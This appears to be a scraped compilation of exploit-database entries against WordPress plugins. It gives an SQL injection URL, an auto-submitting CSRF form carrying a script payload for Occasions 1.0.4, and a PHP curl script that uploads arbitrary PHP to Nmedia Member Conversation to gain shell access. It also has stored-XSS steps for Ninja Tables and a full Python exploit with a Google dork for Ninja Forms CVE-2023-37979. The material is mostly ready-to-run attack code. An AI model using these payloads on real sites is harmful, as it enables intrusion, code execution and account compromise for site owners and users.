http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]


Admin Panel:
http://[Site]/[Path]/oc-login.php

===========
Thanks to
===========
All Indonesian Hacker!!!
HireHackking 
source: https://www.securityfocus.com/bid/58599/info

The Occasions plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Occasions 1.0.4 is vulnerable; other versions may also be affected. 

<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html>
HireHackking 
source: https://www.securityfocus.com/bid/53790/info

The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
         'folder'=>"/test/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php

lo.php
<?php
phpinfo();
?>
HireHackking 
# Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
# Date: 25-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/
# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
# Version: 4.1.7
# Tested on Windows

*How to reproduce vulnerability:*

1. Install Latest WordPress

2. Install and activate Ninja Tables <= 4.1.7
3. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'
and enter the data into the user input field.Then Navigate to Table Design

5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking 
# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979

from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep


# Values:
url = argv[-1]
if url[-1] == "/":
    url = url.rstrip("/")

# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"

  # HTML template
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
  <title>{CVE_NAME}</title>
  <style>
    body {{
      font-family: Arial, sans-serif;
      background-color: #f7f7f7;
      color: #333;
      margin: 0;
      padding: 0;
    }}
    header {{
      background-color: #4CAF50;
      padding: 10px;
      text-align: center;
      color: white;
      font-size: 24px;
    }}
    .cool-button {{
      background-color: #007bff;
      color: white;
      padding: 10px 20px;
      border: none;
      cursor: pointer;
      font-size: 16px;
      border-radius: 4px;
    }}
    .cool-button:hover {{
      background-color: #0056b3;
    }}
  </style>
</head>
<body>
  <header>
	Ninja-forms reflected XSS ({CVE_NAME})</br>
    Created by Mehran Seifalinia
  </header>
  <div style="padding: 20px;">
    <form action="{url}/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="nf&#95;batch&#95;process" />
      <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
      <input type="hidden" name="security" value="e29f2d8dca" />
      <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
      <input type="hidden" name="method&#95;override" value="&#95;respond" />
      <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
      <input type="submit" class="cool-button" value="Click here to Execute XSS" />
    </form>
  </div>
  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
  <footer>
	<a href="https://github.com/Mehran-Seifalinia">Github</a>
	</br>
	<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
  </footer>
</body>
</html>
"""

def exploit():
    with open(f"{CVE_NAME}.html", "w") as poc:
        poc.write(HTML_TEMPLATE)
        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
        sleep(2)
        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")

# Check if the vulnerable version is installed
def check_CVE():
    try:
        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
        if response.status_code != 200 or not("Ninja Forms" in response.text):
            print("[!] Ninja-forms plugin has not installed on this site.")
            return False
        else:
            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
            main_version = int(version.split(".")[0])
            partial_version = int(version.split(".")[1])
            final_version = int(version.split(".")[2])
            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
                print(f"[*] Vulnerable Nonja-forms version {version} detected!")
                return True
            else:
                print(f"[!] Nonja-forms version {version} is not vulnerable!")
                return False
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()

# Check syntax of the script
def check_script():
    usage = f"""
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]

    OPTIONS:
        --exploit:  Open a browser and execute the vulnerability.
    TARGET:
        An URL starts with 'http://' or 'https://'

Examples:
    > {argv[0].split("/")[-1]} https://vulnsite.com
    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
    try:
        if len(argv) < 2 or len(argv) > 3:
            print("[!] Syntax error...")
            print(usage)
            exit()
        elif not url.startswith(tuple(["http://", "https://"])):
            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
            exit()
        else:
            for arg in argv:
                if arg == argv[0]:
                    print("[*]Starting the script >>>")
                    state = check_CVE()
                    if state == False:
                        exit()
                elif arg.lower() == "--exploit":
                    exploit()
                elif arg == url:
                    continue
                else:
                    print(f"[!] What the heck is '{arg}' in the command?")
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()

if __name__ == "__main__":
    check_script()